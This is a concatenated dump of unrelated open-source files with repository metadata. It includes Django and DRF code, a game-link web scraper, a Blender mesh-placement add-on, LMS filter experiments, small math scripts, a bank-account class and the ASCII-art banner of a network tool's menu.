            options={
                'verbose_name': '用户表',
                'verbose_name_plural': '用户表',
            },
        ),
    ]
|
[
"2639074625@qq.com"
] |
2639074625@qq.com
|
bfa47be83ff0943752e0807cdd52e23b8987e48d
|
e804d12c678bc1035ac1def37a813ce6b41f60a6
|
/games_links_parser.py
|
184ecd608d693161b55a441363fbdf05263834fd
|
[] |
no_license
|
ilya201551/PsGameTrader_games_parser
|
76148ea80ff95a1204dfd4b5aeffd882026bee3d
|
d5d06b68b1e5b7e21e5debfe01b7147138bd3a8c
|
refs/heads/master
| 2022-11-15T18:41:39.964207
| 2020-06-23T14:11:18
| 2020-06-23T14:11:18
| 274,419,694
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,004
|
py
|
import requests
from bs4 import BeautifulSoup as bs
# Site root used to turn relative hrefs into absolute game links.
BASE_URL = 'https://nextgame.net'
# Catalogue listing page for PS4 games; paginated via ?PAGEN_1=<n>.
GAMES_CATALOG_URL = 'https://nextgame.net/catalog/sony-playstation4/games-ps4/'
# Browser-like headers so the site serves its normal HTML pages.
HEADERS = {
    'accept': '*/*',
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3'
}
class GamesLinksParser:
    """Scrapes the PS4 games catalogue and collects per-game page links.

    NOTE(review): the constructor performs a network request immediately
    (to count the catalogue pages), so instantiation requires connectivity.
    """
    def __init__(self, headers, session, base_url, games_catalog_url):
        self.session = session
        self.headers = headers
        self.base_url = base_url
        self.games_catalog_url = games_catalog_url
        # Fetch the page count first, then precompute every page URL.
        self.pages_number = self.__get_pages_number()
        self.pages_urls_list = self.__get_pages_urls_list()
    def __get_pages_number(self):
        """Read the pagination widget and return the last page number."""
        request = self.session.get(self.games_catalog_url, headers=self.headers)
        soup = bs(request.content, 'html.parser')
        pages_div = soup.find('div', attrs={'class': 'nums'})
        # NOTE(review): hard-coded index [3] assumes a fixed pagination
        # layout; this raises IndexError if the site renders fewer links.
        pages_a = pages_div.find_all('a')[3]
        return int(pages_a.text)
    def __get_pages_urls_list(self):
        """Build the URL of every catalogue page via the PAGEN_1 parameter."""
        pages_urls_list = []
        for page in range(1, self.pages_number + 1):
            pages_urls_list.append(self.games_catalog_url + '?PAGEN_1=%s' % page)
        return pages_urls_list
    def get_games_links_list(self):
        """Fetch every catalogue page and return absolute game-page links."""
        games_links_list = []
        for page_url in self.pages_urls_list:
            request = self.session.get(page_url, headers=self.headers)
            soup = bs(request.content, 'html.parser')
            games_divs = soup.find_all('div', attrs={'class': 'item-title'})
            for game_div in games_divs:
                # hrefs are relative; prefix with the site root.
                game_link = self.base_url + game_div.find('a')['href']
                games_links_list.append(game_link)
        return games_links_list
def main():
    """Collect every game link from the catalogue and print one per line."""
    session = requests.session()
    games_link_parser = GamesLinksParser(HEADERS, session, BASE_URL, GAMES_CATALOG_URL)
    games_links_list = games_link_parser.get_games_links_list()
    for game_link in games_links_list:
        print(game_link)


# Fix: guard the entry point so importing this module does not trigger
# a full network crawl as a side effect.
if __name__ == '__main__':
    main()
|
[
"kurilchik13@mail.ru"
] |
kurilchik13@mail.ru
|
2d3b00cefeddbe2466d824497e9ce94a26797fab
|
4d35ead619ef8ae5e94084878d4732af1e3847cb
|
/utils/common.py
|
7d3f3958a6862b0b61f01f6a50fb546c01f5137e
|
[] |
no_license
|
hallazie/OrganicGridGenerator
|
bea220798fa2beb734b1e0db31af7f91062ece03
|
b8e4a96e827dc2fb5532de6df76b19fbaf5e1cdb
|
refs/heads/master
| 2023-08-27T17:47:20.151036
| 2021-11-02T03:23:01
| 2021-11-02T03:23:01
| 386,870,439
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 169
|
py
|
# coding:utf-8
# @author: xiao shanghua
from src.items import *
import math
def euc_distance(v1, v2):
    """Return the Euclidean distance between two points with .x/.y attributes.

    Uses math.hypot, which avoids intermediate overflow/underflow compared
    to a hand-rolled sqrt of squared differences.
    """
    return math.hypot(v1.x - v2.x, v1.y - v2.y)
|
[
"hallazie@outlook.com"
] |
hallazie@outlook.com
|
e3243a6972f33c39d42f612fbabe048acdee4370
|
2a7f59d07ec2fe52084a1077dc0e2e70db429aff
|
/PetHospital-server/disease/serializers.py
|
7608e0c7a9a0bcbff6ad3efc365336c042b9b7d2
|
[
"MIT"
] |
permissive
|
Tedstack/PetHospital
|
b73d9ab0f3aa8f8dba060c17f553125221636a1c
|
c4b11c82ccd18d8a5277f651befbfa60500bebc6
|
refs/heads/master
| 2021-04-26T23:09:53.295703
| 2019-08-29T02:14:06
| 2019-08-29T02:14:06
| 123,938,094
| 0
| 0
| null | 2020-07-15T15:35:41
| 2018-03-05T15:18:19
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 591
|
py
|
from rest_framework import serializers
from .models import *
class DiseaseGroupSerializer(serializers.ModelSerializer):
    """Serializes every field of the DiseaseGroup model."""
    class Meta:
        model = DiseaseGroup
        fields = '__all__'
class DiseaseSerializer(serializers.ModelSerializer):
    """Serializes every field of the Disease model."""
    class Meta:
        model = Disease
        fields = '__all__'
class DiseaseImageSerializer(serializers.ModelSerializer):
    """Serializes every field of the DiseaseImage model."""
    class Meta:
        model = DiseaseImage
        fields = '__all__'
class ProcessSerializer(serializers.ModelSerializer):
    """Serializes every field of the Process model."""
    class Meta:
        model = Process
        fields = '__all__'
|
[
"1542752218@qq.com"
] |
1542752218@qq.com
|
5e76dbde1a46d4f115b4a7aa5778b0877a4af877
|
a59a7346a0cc7ed84d091da3784e01f13b67cf17
|
/arts/migrations/0001_initial.py
|
9a9c4f724c38997d926fd06e58f5ea05bdaed5e4
|
[] |
no_license
|
nikhilmuz/RangKshetra-API-Gateway
|
5ed66ea851d451125f612c63c5be38026baa567e
|
b5d4a104ba7eb90dc4074cca16c9d8cdaf2be3f0
|
refs/heads/master
| 2020-03-28T13:51:33.515582
| 2018-10-12T17:42:36
| 2018-10-12T17:42:36
| 148,435,972
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 682
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-09-03 10:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial migration of the arts app: creates the File table.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='File',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): upload_to is a bytes literal b'' (files land in
                # MEDIA_ROOT directly) — confirm this is intentional.
                ('file', models.FileField(upload_to=b'')),
                ('remark', models.CharField(max_length=20)),
                # Set automatically on creation.
                ('timestamp', models.DateTimeField(auto_now_add=True)),
            ],
        ),
    ]
|
[
"nikhil.nikhil.muz@gmail.com"
] |
nikhil.nikhil.muz@gmail.com
|
f95eb6c548d33fdfb4e4c5bca3aec825ebb08bec
|
8957fd60446378ba77d5920c883935bac9275933
|
/btools/building/customobj.py
|
f74c400d927c3004785f0cf10d68d480f9d7714c
|
[
"MIT"
] |
permissive
|
ranjian0/building_tools
|
37f647608873288db3346bc7d2d9e2c97fbefabe
|
4a5950ed712b41fa3b953ea4ac3e1b1db8d5f489
|
refs/heads/master
| 2023-09-04T01:53:35.926031
| 2023-03-12T09:58:05
| 2023-03-12T09:58:05
| 123,632,239
| 831
| 94
|
MIT
| 2021-02-08T12:58:09
| 2018-03-02T21:22:22
|
Python
|
UTF-8
|
Python
| false
| false
| 10,758
|
py
|
"""
Tools to allow users to place custom meshes on a building
"""
import bpy
import bmesh
from mathutils import Matrix, Vector
from bpy.props import PointerProperty
from .facemap import (
FaceMap,
add_faces_to_map,
add_facemap_for_groups
)
from ..utils import (
select,
local_xyz,
bm_to_obj,
crash_safe,
bm_from_obj,
popup_message,
calc_faces_median,
calc_verts_median,
get_bounding_verts,
calc_face_dimensions,
bmesh_from_active_object,
subdivide_face_vertically,
subdivide_face_horizontally,
get_selected_face_dimensions,
)
from ..utils import VEC_UP, VEC_FORWARD
from .array import ArrayProperty, ArrayGetSet
from .sizeoffset import SizeOffsetProperty, SizeOffsetGetSet
class CustomObjectProperty(bpy.types.PropertyGroup, SizeOffsetGetSet, ArrayGetSet):
array: PointerProperty(type=ArrayProperty)
size_offset: PointerProperty(type=SizeOffsetProperty)
def init(self, wall_dimensions):
self["wall_dimensions"] = wall_dimensions
self.size_offset.init(
(self["wall_dimensions"][0] / self.count, self["wall_dimensions"][1]),
default_size=(1.0, 1.0),
default_offset=(0.0, 0.0),
)
def draw(self, context, layout):
box = layout.box()
self.size_offset.draw(context, box)
layout.prop(self.array, "count")
@crash_safe
def add_custom_execute(self, context):
custom_obj = context.scene.btools_custom_object
if not custom_obj:
# Custom object has not been assigned
self.report({'INFO'}, "No Object Selected!")
return {"CANCELLED"}
if custom_obj.users == 0 or custom_obj.name not in context.view_layer.objects:
# Object was already deleted
self.report({'INFO'}, "Object has been deleted!")
return {"CANCELLED"}
self.props.init(get_selected_face_dimensions(context))
apply_transforms(context, custom_obj)
place_custom_object(context, self.props, custom_obj)
transfer_materials(custom_obj, context.object)
return {'FINISHED'}
class BTOOLS_OT_add_custom(bpy.types.Operator):
"""Place custom meshes on the selected faces"""
bl_idname = "btools.add_custom"
bl_label = "Add Custom Geometry"
bl_options = {"REGISTER", "UNDO", "PRESET"}
props: PointerProperty(type=CustomObjectProperty)
@classmethod
def poll(cls, context):
return context.object is not None and context.mode == "EDIT_MESH"
def execute(self, context):
add_facemap_for_groups([FaceMap.CUSTOM])
return add_custom_execute(self, context)
def draw(self, context):
self.props.draw(context, self.layout)
def apply_transforms(context, obj):
# -- store the current active object
mode_previous = context.mode
active_previous = context.active_object
# -- switch to object mode, if we are not already there
if context.mode != "OBJECT":
bpy.ops.object.mode_set(mode='OBJECT')
# -- make obj the active object and select it
bpy.context.view_layer.objects.active = obj
select(bpy.context.view_layer.objects, False)
obj.select_set(True)
# -- apply transform
bpy.ops.object.transform_apply(location=True, rotation=True, scale=True)
# -- resume the previous state
bpy.context.view_layer.objects.active = active_previous
select(bpy.context.view_layer.objects, False)
active_previous.select_set(True)
bpy.ops.object.mode_set(mode=mode_previous.replace('_MESH', ""))
def place_custom_object(context, prop, custom_obj):
with bmesh_from_active_object(context) as bm:
faces = [face for face in bm.faces if face.select]
for face in faces:
face.select = False
# No support for upward/downward facing
if face.normal.z:
popup_message("Faces with Z+/Z- normals not supported!", title="Invalid Face Selection")
continue
array_faces = subdivide_face_horizontally(bm, face, widths=[prop.size_offset.size.x] * prop.count)
for aface in array_faces:
# -- Create split and place obj
split_face = create_split(bm, aface, prop.size_offset.size, prop.size_offset.offset)
place_object_on_face(bm, split_face, custom_obj, prop)
bmesh.ops.remove_doubles(bm, verts=bm.verts, dist=0.0001)
def transfer_materials(from_object, to_obj):
"""Transfer materials from 'from_object' to 'to_object'"""
materials = from_object.data.materials
if not materials:
return
# -- copy materials
to_mats = to_obj.data.materials
if not to_mats:
# -- to_obj has no materials
list(map(to_mats.append, materials))
else:
# -- to_obj has some materials, ensure we are not duplicating
for mat in materials:
if mat.name not in to_mats:
to_mats.append(mat)
def mat_name_from_idx(idx):
for i, m in enumerate(materials):
if i == idx:
return m.name.encode()
return "".encode()
# -- store material names on the face layer
bm = bm_from_obj(from_object)
bm.faces.layers.string.verify()
mat_name = bm.faces.layers.string.active
for face in bm.faces:
face[mat_name] = mat_name_from_idx(face.material_index)
bm_to_obj(bm, from_object)
def duplicate_into_bm(bm, obj):
"""Copy all the mesh data in obj to the bm
Return the newly inserted faces
"""
max_index = len(bm.faces)
bm.from_mesh(obj.data.copy())
return [f for f in bm.faces if f.index >= max_index]
# TODO(ranjian0) refactor function (duplicated from create_window_split)
def create_split(bm, face, size, offset):
"""Use properties from SplitOffset to subdivide face into regular quads"""
wall_w, wall_h = calc_face_dimensions(face)
# horizontal split
h_widths = [wall_w / 2 + offset.x - size.x / 2, size.x, wall_w / 2 - offset.x - size.x / 2]
h_faces = subdivide_face_horizontally(bm, face, h_widths)
# vertical split
v_width = [wall_h / 2 + offset.y - size.y / 2, size.y, wall_h / 2 - offset.y - size.y / 2]
v_faces = subdivide_face_vertically(bm, h_faces[1], v_width)
return v_faces[1]
def place_object_on_face(bm, face, custom_obj, prop):
"""Place the custom_object mesh flush on the face"""
# XXX get mesh from custom_obj into bm
face_idx = face.index
custom_faces = duplicate_into_bm(bm, custom_obj)
face = [f for f in bm.faces if f.index == face_idx].pop() # restore reference
add_faces_to_map(bm, custom_faces, FaceMap.CUSTOM)
custom_verts = list({v for f in custom_faces for v in f.verts})
# (preprocess)calculate bounds of the object
# NOTE: bounds are calculated before any transform is made
dims = custom_obj.dimensions
current_size = [max(dims.x, dims.y), dims.z]
# -- move the custom faces into proper position on this face
transform_parallel_to_face(bm, custom_faces, face)
scale_to_size(bm, custom_verts, current_size, prop.size_offset.size, local_xyz(face))
# cleanup
bmesh.ops.delete(bm, geom=[face], context="FACES_ONLY")
def get_coplanar_faces(face_verts):
""" Determine extent faces that should be coplanar to walls"""
bounds = get_bounding_verts(face_verts)
coplanar_faces = (
list(bounds.topleft.link_faces) +
list(bounds.topright.link_faces) +
list(bounds.botleft.link_faces) +
list(bounds.botright.link_faces)
)
return set(coplanar_faces)
def calc_coplanar_median(face_verts):
""" Determine the median point for coplanar faces"""
return calc_faces_median(get_coplanar_faces(face_verts))
def calc_coplanar_normal(faces):
face_verts = list({v for f in faces for v in f.verts})
coplanar_faces = get_coplanar_faces(face_verts)
normals = {f.normal.copy().to_tuple(3) for f in coplanar_faces}
return Vector(normals.pop())
def transform_parallel_to_face(bm, custom_faces, target_face):
"""Move and rotate verts(mesh) so that it lies with it's
forward-extreme faces parallel to `face`
"""
target_normal = target_face.normal.copy()
target_median = target_face.calc_center_median()
verts = list({v for f in custom_faces for v in f.verts})
verts_median = calc_verts_median(verts)
custom_normal = calc_coplanar_normal(custom_faces)
try:
angle = target_normal.xy.angle_signed(custom_normal.xy)
except ValueError:
# TODO(ranjian0) Support all mesh shapes when placing along face
angle = 0
bmesh.ops.rotate(
bm, verts=verts,
cent=verts_median,
matrix=Matrix.Rotation(angle, 4, VEC_UP)
)
# -- determine the median of the faces that should be coplanar to the walls
coplanar_median = calc_coplanar_median(verts)
coplanar_median.z = verts_median.z # Compensate on Z axis for any coplanar faces not considered in calculations
# -- move the custom faces to the target face based on coplanar median
transform_diff = target_median - coplanar_median
bmesh.ops.translate(bm, verts=verts, vec=transform_diff)
def scale_to_size(bm, verts, current_size, target_size, local_dir):
"""Scale verts to target size along local direction (x and y)"""
x_dir, y_dir, z_dir = local_dir
target_width, target_height = target_size
current_width, current_height = current_size
# --scale
scale_x = x_dir * (target_width / current_width)
scale_y = y_dir * (target_height / current_height)
scale_z = Vector(map(abs, z_dir))
bmesh.ops.scale(
bm, verts=verts, vec=scale_x + scale_y + scale_z,
space=Matrix.Translation(-calc_verts_median(verts))
)
def set_face_materials(bm, faces):
mat_name = bm.faces.layers.string.active
if not mat_name:
return
obj_mats = bpy.context.object.data.materials
for f in faces:
mat = obj_mats.get(f[mat_name].decode())
f.material_index = list(obj_mats).index(mat)
classes = (CustomObjectProperty, BTOOLS_OT_add_custom)
def register_custom():
bpy.types.Scene.btools_custom_object = PointerProperty(
type=bpy.types.Object, description="Object to use for custom placement"
)
for cls in classes:
bpy.utils.register_class(cls)
def unregister_custom():
del bpy.types.Scene.btools_custom_object
for cls in classes:
bpy.utils.unregister_class(cls)
|
[
"karanjaichungwa@gmail.com"
] |
karanjaichungwa@gmail.com
|
f170ae73cc32f8a24174a1cab8adf207eff19644
|
68cc812ca27a960b8405523f5b1dfe35380e3ff7
|
/python/Flask.py
|
e74d13a946ee3705ef22d66a2fffa1feec9eded5
|
[] |
no_license
|
aloxvok/devopsbc
|
7c1bd78456af71ed21e04448fab877b5e4fcfe66
|
ba5a5d7a88ada055c86de4249b0de5194a32e741
|
refs/heads/master
| 2022-11-20T01:26:23.522262
| 2020-07-23T01:53:06
| 2020-07-23T01:53:06
| 266,654,300
| 0
| 0
| null | 2020-05-30T01:24:45
| 2020-05-25T01:14:45
|
Python
|
UTF-8
|
Python
| false
| false
| 111
|
py
|
from flask import Flask
# Single Flask application instance for this module.
app = Flask(__name__)
# NOTE(review): the route decorator below is commented out, so hello_world
# is never registered as a view — presumably unintended; confirm.
#@app.route('/')
def hello_world():
    """Return the canonical greeting string."""
    greeting = 'Hello, World!'
    return greeting
|
[
"hpinot9@gmail.com"
] |
hpinot9@gmail.com
|
0dbdb5ae711a8ff93851753cea7a8f866b145477
|
aa0d3ced25b3c919aefab90609acf30b7d242940
|
/collatio/migrations/0003_tag_image.py
|
5bda8a28ed803f7ac3dd1f336f16f0b23e7778df
|
[] |
no_license
|
sanchitkripalani47/Collatio
|
00428b7bf31a0d418a87f419518ae45832da2294
|
1b5037a3046226b61a41e1925763b246f18b7e6a
|
refs/heads/main
| 2023-05-19T01:53:05.150499
| 2021-06-10T14:49:01
| 2021-06-10T14:49:01
| 343,282,263
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 429
|
py
|
# Generated by Django 3.0.5 on 2021-03-14 07:10
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds an optional image (with a placeholder default) to the Tag model.
    dependencies = [
        ('collatio', '0002_auto_20210313_2313'),
    ]

    operations = [
        migrations.AddField(
            model_name='tag',
            name='image',
            field=models.ImageField(default='image_not_found.jpg', null=True, upload_to='images'),
        ),
    ]
|
[
"sanchitkripalani47@gmail.com"
] |
sanchitkripalani47@gmail.com
|
1d8a0f6fcb29d01cfa39a81b7af8a2a2e862f97e
|
f88bc2bfc596908f2155ba0c4e58fce46321d988
|
/call.py
|
daa82ad0b71c3b1b1558f0b515311374c0201ca3
|
[] |
no_license
|
FragrantRookie/LMS-ANN-Project
|
8c8de8df93f6a5ccf1d391092f8fdcbf93a1f60e
|
c495bf14afc2fe1dbb6bfdc4f1991839bb3ef432
|
refs/heads/master
| 2023-04-26T15:58:46.495484
| 2018-11-12T14:06:51
| 2018-11-12T14:06:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,066
|
py
|
from speech_noise_removal_final import RNNFilter
from LMS_tf import LMSFilter
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.ticker as ticker
import pickle
#for learning rate
# Lower-range learning rates to sweep; kept sorted so the plot x-axis is ordered.
lr = [0.2, 0.15, 0.1, 0.05, 0.02, 0.015, 0.01, 0.005, 0.002, 0.001] #0.75, 0.7, 0.6, 0.5, 0.4, 0.3, 0.25,
#lr = [0.002]
lr.sort()
# Final NMSE per learning rate on the training / testing signals.
fin_snr_train = []
fin_snr_test = []
def l_plotting(train_data, test_data):
    """Plot final NMSE vs learning rate (lower range); save PNG and pickled figure.

    :param train_data: final NMSE per learning rate on the training data.
    :param test_data: final NMSE per learning rate on the testing data.
    """
    fig, ax = plt.subplots()
    ax.plot(lr, train_data, 'r', linewidth=4.0, label='Final NMSE of output for training data')
    ax.plot(lr, test_data, 'b', linewidth=4.0, label='NMSE of output for testing data')
    # Fix: the line labels above were never rendered because legend() was
    # never called, leaving the two curves indistinguishable.
    ax.legend(fontsize=20)
    start, end = ax.get_ylim()
    ax.yaxis.set_ticks(np.arange(start, end, 0.5))
    ax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%0.1f'))
    # NOTE(review): title says "RNN Filter" but the sweep drives LMSFilter —
    # confirm which filter this experiment actually targets.
    fig.suptitle('Final NMSE vs Learning Rate (lower range) for RNN Filter', fontsize=36)
    plt.ylabel('NMSE', fontsize=24)
    plt.xlabel('Learning Rate', fontsize=24)
    for tick in ax.xaxis.get_major_ticks():
        tick.label.set_fontsize(20)
    for tick in ax.yaxis.get_major_ticks():
        tick.label.set_fontsize(20)
    #plt.show()
    plt.savefig('plots/snrvslrl_code.png')
    with open('plots/snrvslrl_code.pkl', "wb") as fp:
        pickle.dump(fig, fp, protocol=4)
# Run one LMS training sweep per learning rate and collect final NMSE values.
for i in range(len(lr)):
    # NOTE(review): `filter` shadows the builtin of the same name.
    filter = LMSFilter('Mockingbird.wav', epoch = 10, lr = lr[i])
    print('For learning rate:', lr[i])
    snr_train, snr_test = filter.driver()
    fin_snr_train.append(snr_train)
    fin_snr_test.append(snr_test)
l_plotting(fin_snr_train, fin_snr_test)
#for higher learning rate
# Reset the sweep state for the higher range of learning rates.
lr = [0.75, 0.7, 0.6, 0.5, 0.4, 0.3, 0.25]
#lr = [0.002]
lr.sort()
fin_snr_train = []
fin_snr_test = []
def h_plotting(train_data, test_data):
    """Plot final NMSE vs learning rate (higher range); save PNG and pickled figure.

    :param train_data: final NMSE per learning rate on the training data.
    :param test_data: final NMSE per learning rate on the testing data.
    """
    fig, ax = plt.subplots()
    ax.plot(lr, train_data, 'r', linewidth=4.0, label='Final NMSE of output for training data')
    ax.plot(lr, test_data, 'b', linewidth=4.0, label='NMSE of output for testing data')
    # Fix: the line labels above were never rendered because legend() was
    # never called, leaving the two curves indistinguishable.
    ax.legend(fontsize=20)
    ax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%0.1f'))
    # NOTE(review): title says "RNN Filter" but the sweep drives LMSFilter —
    # confirm which filter this experiment actually targets.
    fig.suptitle('Final NMSE vs Learning Rate (higher range) for RNN Filter', fontsize=36)
    plt.ylabel('NMSE', fontsize=24)
    plt.xlabel('Learning Rate', fontsize=24)
    for tick in ax.xaxis.get_major_ticks():
        tick.label.set_fontsize(20)
    for tick in ax.yaxis.get_major_ticks():
        tick.label.set_fontsize(20)
    #plt.show()
    plt.savefig('plots/snrvslrh_code.png')
    with open('plots/snrvslrh_code.pkl', "wb") as fp:
        pickle.dump(fig, fp, protocol=4)
# Run one LMS training sweep per (higher-range) learning rate.
for i in range(len(lr)):
    # NOTE(review): `filter` shadows the builtin of the same name.
    filter = LMSFilter('Mockingbird.wav', epoch = 10, lr = lr[i])
    print('For learning rate:', lr[i])
    snr_train, snr_test = filter.driver()
    fin_snr_train.append(snr_train)
    fin_snr_test.append(snr_test)
h_plotting(fin_snr_train, fin_snr_test)
#for filter length
# Filter lengths (taps) to sweep next; sorted for an ordered x-axis.
fl = [512, 256, 128, 64, 32, 16, 8, 4]
#fl = [4]
fl.sort()
fin_snr_train = []
fin_snr_test = []
def fl_plotting(train_data, test_data):
    """Plot final NMSE vs filter length; save PNG and pickled figure.

    :param train_data: final NMSE per filter length on the training data.
    :param test_data: final NMSE per filter length on the testing data.
    """
    fig, ax = plt.subplots()
    ax.plot(fl, train_data, 'r', linewidth=4.0, label='Final NMSE of output for training data')
    ax.plot(fl, test_data, 'b', linewidth=4.0, label='NMSE of output for testing data')
    # Fix: the line labels above were never rendered because legend() was
    # never called, leaving the two curves indistinguishable.
    ax.legend(fontsize=20)
    start, end = ax.get_ylim()
    ax.yaxis.set_ticks(np.arange(start, end, 0.1))
    ax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%0.1f'))
    # NOTE(review): title says "RNN Filter" but the sweep drives LMSFilter —
    # confirm which filter this experiment actually targets.
    fig.suptitle('Final NMSE vs Filter Length for RNN Filter', fontsize=36)
    plt.ylabel('NMSE', fontsize=24)
    plt.xlabel('Filter Length', fontsize=24)
    for tick in ax.xaxis.get_major_ticks():
        tick.label.set_fontsize(20)
    for tick in ax.yaxis.get_major_ticks():
        tick.label.set_fontsize(20)
    #plt.show()
    plt.savefig('plots/snrvsfl_code.png')
    with open('plots/snrvsfl_code.pkl', "wb") as fp:
        pickle.dump(fig, fp, protocol=4)
# Run one LMS training sweep per filter length (tap count).
for i in range(len(fl)):
    # NOTE(review): `filter` shadows the builtin of the same name.
    filter = LMSFilter('Mockingbird.wav', epoch = 10, tap = fl[i])
    print('For filter length:', fl[i])
    snr_train, snr_test = filter.driver()
    fin_snr_train.append(snr_train)
    fin_snr_test.append(snr_test)
fl_plotting(fin_snr_train, fin_snr_test)
|
[
"rohitkumar97@gmail.com"
] |
rohitkumar97@gmail.com
|
1344db5d293e0d52eb43ae1b44c466eb59437167
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02380/s484509438.py
|
102ce45748de53d8af54b0469dd1cd39937af871
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 216
|
py
|
import math
# Read two side lengths and the included angle (degrees) from one line.
a, b, C = map(int, input().split())
rad_c = math.radians(C)
# Area from two sides and the included angle: S = (1/2)·a·b·sin(C).
area = a * b * math.sin(rad_c) * (1 / 2)
# Law of cosines gives the squared length of the third side.
c_sq = a ** 2 + b ** 2 - 2 * a * b * math.cos(rad_c)
perimeter = a + b + math.sqrt(c_sq)
# Height relative to side a: S = a·h/2  =>  h = 2S/a.
height = 2 * area / a
# Fix: the results sequence was named `list`, shadowing the builtin.
for value in (area, perimeter, height):
    print('{:.08f}'.format(value))
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
13d862da3d9fcf0fc7917109af3e9ffbe790f080
|
b98d58296d7e69a189015c99c88ac0ca647f6234
|
/ContaEspecial.py
|
fe0c2ca0111cd69572e179f55a4e012d155b6333
|
[] |
no_license
|
RaulRory/contabanco.py
|
41f9a7f6b98dd91326957455baff3d9537d30b66
|
02d7f7f0a5eb3e37bbb2a3b3c0e5901c05cacd39
|
refs/heads/main
| 2023-03-15T02:47:35.182091
| 2021-03-20T19:35:10
| 2021-03-20T19:35:10
| 350,049,176
| 0
| 0
| null | 2021-03-21T16:07:57
| 2021-03-21T16:07:56
| null |
UTF-8
|
Python
| false
| false
| 951
|
py
|
from conta import Conta
class contaEspecial(Conta):
    """Special (salary) account extending the base Conta model.

    NOTE(review): several names used below (ContaEspecial, listaContas,
    alteracao, receberCredito) are not defined in this file — most methods
    will raise NameError if called; verify against the rest of the project.
    """
    def __init__(self, saldo, numeroConta, nome, salario):
        super().__init__(saldo, numeroConta, nome)
        # The salary is stored under the attribute name `especial`.
        self.especial = salario
    def criarContaSalario(self):
        # NOTE(review): `ContaEspecial` (capital C) is undefined — the class
        # itself is named `contaEspecial`; likely a typo.
        conta = ContaEspecial()
        conta.numeroConta = input("Digite um numero para a sua conta")
        conta.saldo = 0
        # NOTE(review): salary is kept as the raw input string, not a number.
        conta.salario = input("Qual o seu salario?")
        conta.nome = input("Como você se chama?")
        listaContas.append(conta)
        print(listaContas)
    def receberSalario(self):
        # NOTE(review): input(print(...)) prints the text and then passes
        # None as the prompt — probably meant input("Quanto você ganha de salario").
        salario = int(input(print("Quanto você ganha de salario")))
        return salario
    def apagarConta(self, numeroConta):
        listaContas.excluir(numeroConta)
    def alterarConta(self, numeroConta, obejetoAlterado):
        # NOTE(review): `alteracao` is undefined and the parameter
        # `obejetoAlterado` is unused — confirm the intended behavior.
        listaContas.Ediar(numeroConta, alteracao)
    def receberCredito(self):
        # NOTE(review): this appends the function object itself to the list.
        listaContas.append(receberCredito)
|
[
"noreply@github.com"
] |
RaulRory.noreply@github.com
|
0b7e9ca017455cdac19f64b9c4f129470f69599f
|
677bb2d246c74ce1cacda831e4b1450d93122319
|
/src/ng/menus.py
|
e468078ffa3049d9dd8eaee0766cd4704336aee0
|
[] |
no_license
|
skuldug12/networktools
|
e4b11dbcf0f6893c53ee9700fa758969d35b810d
|
ca8506cfa6648433be3fa936bdb30b71e1560541
|
refs/heads/master
| 2020-12-02T09:44:09.651455
| 2020-01-21T12:25:42
| 2020-01-21T12:25:42
| 230,969,522
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,450
|
py
|
import subprocess
#colors
# ANSI SGR escape sequences used to colorize terminal output.
red = "\033[31m"
green = "\033[32m"
yellow = "\033[33m"
blue = "\033[34m"
purple = "\033[35m"
clear = "\033[00m"  # reset to the terminal's default style
menumessages = ['''
{p}:::!~!!!!!:.
.xUHWH!! !!?M88WHX:.
.X*#M@$!! !X!M$$$$$$WWx:.
:!!!!!!?H! :!$!$$$$$$$$$$8X: {b}NETWORKGRAVE{c}
{p}!!~ ~:~!! :~!$!#$$$$$$$$$$8X: ~~~~~~~~~~~~
:!~::!H!< ~.U$X!?R$$$$$$$$MM!
~!~!!!!~~ .:XW$$$U!!?$$$$$$RMM! {p}SCAN{c} {b}THEN{c} {p}DESTROY{c}...
{p}!:~~~ .:!M"T#$$$$WX??#MRRMMM!
~?WuxiW*` `"#$$$$8!!!!??!!!{c} PRESS {b}[ENTER]{c} TO CONTINUE
{p}:X- M$$$$ `"T#$T~!8$WUXU~
:%` ~#$$$m: ~!~ ?$$$$$$
:!`.- ~T$$$$8xx. .xWW- ~""##*"
..... -~~:<` ! ~?T#$$@@W@*?$$ /`
W$@@M!!! .!~~ !! .:XUW$W!~ `"~: :
#"~~`.:x%`!! !H: !WM$$$$Ti.: .!WUn+!`
:::~:!!`:X~ .: ?H.!u "$$$B$$$!W:U!T$$M~
.~~ :X@!.-~ ?@WTWo("*$$$W$TH$! `
Wi.~!X$?!-~ : ?$$$B$Wu("**$RM!
$R@i.~~ ! : ~$$$$$B$$en:`` {p}s k u l{c}
{p}?MXT@Wx.~ : ~"##*$$$$M~ {c}
'''.format(b=blue, c=clear, p=purple, r=red)]
#startscreen
def startscreen():
    """Clear the terminal, show the banner, and wait for the user to continue."""
    # Fix: pass the command as an argument list with no shell. Spawning a
    # shell via shell=True is unnecessary here and is the riskier form.
    subprocess.call(["clear"])
